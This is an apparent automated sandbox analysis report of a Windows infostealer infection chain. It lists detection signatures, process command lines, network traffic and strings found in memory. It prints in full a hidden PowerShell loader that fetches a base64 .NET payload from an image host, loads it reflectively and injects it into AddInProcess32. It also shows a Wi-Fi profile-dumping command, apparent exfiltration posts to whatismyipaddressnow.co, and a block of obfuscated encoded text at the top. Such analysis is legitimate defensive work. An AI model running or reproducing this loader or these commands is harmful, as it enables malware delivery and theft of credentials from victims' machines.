eZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg

          Data Obfuscation

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }", CommandLine|base

          Stealing of Sensitive Information

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe, ParentProcessId: 8168, ParentProcessName: AddInProcess32.exe, ProcessCommandLine: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All, ProcessId: 1160, ProcessName: cmd.exe
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: http://93.123.39.71/sword.txtAvira URL Cloud: Label: malware
          Source: whatismyipaddressnow.coVirustotal: Detection: 6%Perma Link
          Source: uploaddeimagens.com.brVirustotal: Detection: 5%Perma Link
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49710 version: TLS 1.0
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49706 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.8:49707 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:54306 version: TLS 1.2
          Source: Binary string: System.Data.Linq.pdb source: powershell.exe, 00000005.00000002.1593249339.0000021C89401000.00000004.00000800.00020000.00000000.sdmp

          Software Vulnerabilities

          barindex
          Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 0169145Ch9_2_01691184
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then jmp 0169145Ch9_2_0169125D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h9_2_01692A8D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then mov dword ptr [ebp-20h], 00000000h9_2_01692A98
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h9_2_06427368
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h9_2_06427360

          Networking

          barindex
          Source: C:\Windows\System32\wscript.exeNetwork Connect: 188.114.97.3 443Jump to behavior
          Source: unknownDNS query: name: paste.ee
          Source: global trafficHTTP traffic detected: GET /images/004/798/013/original/new_image.jpg?1718284138 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /images/004/798/013/original/new_image.jpg?1718284138 HTTP/1.1Host: uploaddeimagens.com.br
          Source: global trafficHTTP traffic detected: GET /API/FETCH/filter.php?countryid=14&token=vKEV5IjRm7wh HTTP/1.1Host: whatismyipaddressnow.coConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /API/FETCH/filter.php?countryid=14&token=vKEV5IjRm7wh HTTP/1.1Host: whatismyipaddressnow.co
          Source: global trafficHTTP traffic detected: POST /API/FETCH/getcountry.php HTTP/1.1Content-Type: multipart/form-data; boundary=---TelegramBotAPI_638539932481665828Host: whatismyipaddressnow.coContent-Length: 3035Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /sword.txt HTTP/1.1Host: 93.123.39.71Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
          Source: Joe Sandbox ViewASN Name: TUT-ASUS TUT-ASUS
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: unknownDNS query: name: whatismyipaddressnow.co
          Source: unknownDNS query: name: whatismyipaddressnow.co
          Source: unknownDNS query: name: icanhazip.com
          Source: unknownDNS query: name: icanhazip.com
          Source: unknownDNS query: name: ip-api.com
          Source: global trafficHTTP traffic detected: GET /d/3dasY HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
          Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49710 version: TLS 1.0
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownTCP traffic detected without corresponding DNS query: 93.123.39.71
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /d/3dasY HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /images/004/798/013/original/new_image.jpg?1718284138 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /images/004/798/013/original/new_image.jpg?1718284138 HTTP/1.1Host: uploaddeimagens.com.br
          Source: global trafficHTTP traffic detected: GET /API/FETCH/filter.php?countryid=14&token=vKEV5IjRm7wh HTTP/1.1Host: whatismyipaddressnow.coConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /API/FETCH/filter.php?countryid=14&token=vKEV5IjRm7wh HTTP/1.1Host: whatismyipaddressnow.co
          Source: global trafficHTTP traffic detected: GET /sword.txt HTTP/1.1Host: 93.123.39.71Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: paste.ee
          Source: global trafficDNS traffic detected: DNS query: uploaddeimagens.com.br
          Source: global trafficDNS traffic detected: DNS query: whatismyipaddressnow.co
          Source: global trafficDNS traffic detected: DNS query: icanhazip.com
          Source: global trafficDNS traffic detected: DNS query: 75.103.13.0.in-addr.arpa
          Source: global trafficDNS traffic detected: DNS query: ip-api.com
          Source: unknownHTTP traffic detected: POST /API/FETCH/getcountry.php HTTP/1.1Content-Type: multipart/form-data; boundary=---TelegramBotAPI_638539932481665828Host: whatismyipaddressnow.coContent-Length: 3035Connection: Keep-Alive
          Source: cert9.db.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
          Source: cert9.db.9.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
          Source: cert9.db.9.drString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
          Source: cert9.db.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
          Source: cert9.db.9.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
          Source: cert9.db.9.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
          Source: cert9.db.9.drString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000302E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000302E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://icanhazip.com/
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000307E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000307E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
          Source: cert9.db.9.drString found in binary or memory: http://ocsp.digicert.com0
          Source: cert9.db.9.drString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
          Source: powershell.exe, 00000005.00000002.1706558041.0000021CD9113000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000003.00000002.1937420985.000001E4CFD41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1706558041.0000021CD8EF1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.0000000002FE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.00000000030DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://whatismyipaddressnow.co
          Source: powershell.exe, 00000005.00000002.1706558041.0000021CD9113000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: cert9.db.9.drString found in binary or memory: http://x1.c.lencr.org/0
          Source: cert9.db.9.drString found in binary or memory: http://x1.i.lencr.org/0
          Source: AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: powershell.exe, 00000003.00000002.1937420985.000001E4CFCF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
          Source: powershell.exe, 00000003.00000002.1937420985.000001E4CFD12000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1706558041.0000021CD8EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
          Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
          Source: AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
          Source: wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
          Source: AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.00000000031EF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hT
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.00000000031EF000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.00000000030C2000.00000004.00000800.00020000.00000000.sdmp, tmp7752.tmp.dat.9.drString found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: tmp7752.tmp.dat.9.drString found in binary or memory: https://chrome.google.com/webstore?hl=enWeb
          Source: AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
          Source: wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
          Source: powershell.exe, 00000005.00000002.1706558041.0000021CD9113000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000003.00000002.1977414907.000001E4E7D10000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
          Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.comZ
          Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/H
          Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/_
          Source: wscript.exe, 00000000.00000003.1408406314.00000260C4BEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1409759305.00000260C4BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411362998.00000260C4A80000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408211017.00000260C4A8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/3dasY
          Source: wscript.exe, 00000000.00000003.1408406314.00000260C4BEF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1409759305.00000260C4BF4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4BF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/3dasY$
          Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/3dasY0
          Source: wscript.exe, 00000000.00000003.1409306033.00000260C2CFD000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411281235.00000260C2D37000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410321938.00000260C2D37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/3dasY4
          Source: wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/3dasYz
          Source: wscript.exe, 00000000.00000003.1409968390.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
          Source: tmpB97.tmp.dat.9.drString found in binary or memory: https://support.mozilla.org
          Source: tmpB97.tmp.dat.9.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
          Source: tmpB97.tmp.dat.9.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
          Source: wscript.exe, 00000000.00000003.1410808020.00000260C5A1C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1411597272.00000260C4C27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1410412960.00000260C4F85000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1408406314.00000260C4C27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
          Source: powershell.exe, 00000005.00000002.1706558041.0000021CD9113000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br
          Source: powershell.exe, 00000005.00000002.1706558041.0000021CD8EF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.0000000002FE1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1681596776.00000000030DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatismyipaddressnow.co
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.0000000002FE1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatismyipaddressnow.co/API/FETCH/filter.php?countryid=14&token=vKEV5IjRm7wh
          Source: AddInProcess32.exe, 00000009.00000002.1681596776.000000000302E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://whatismyipaddressnow.co/API/FETCH/getcountry.php
          Source: AddInProcess32.exe, 00000009.00000002.1708598026.00000000040E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000009.00000002.1708598026.000000000437D000.00000004.00000800.00020000.00000000.sdmp, tmp448A.tmp.dat.9.dr, tmp77A1.tmp.dat.9.drString found in binary or memory: https://www.ecosia.org/newtab/
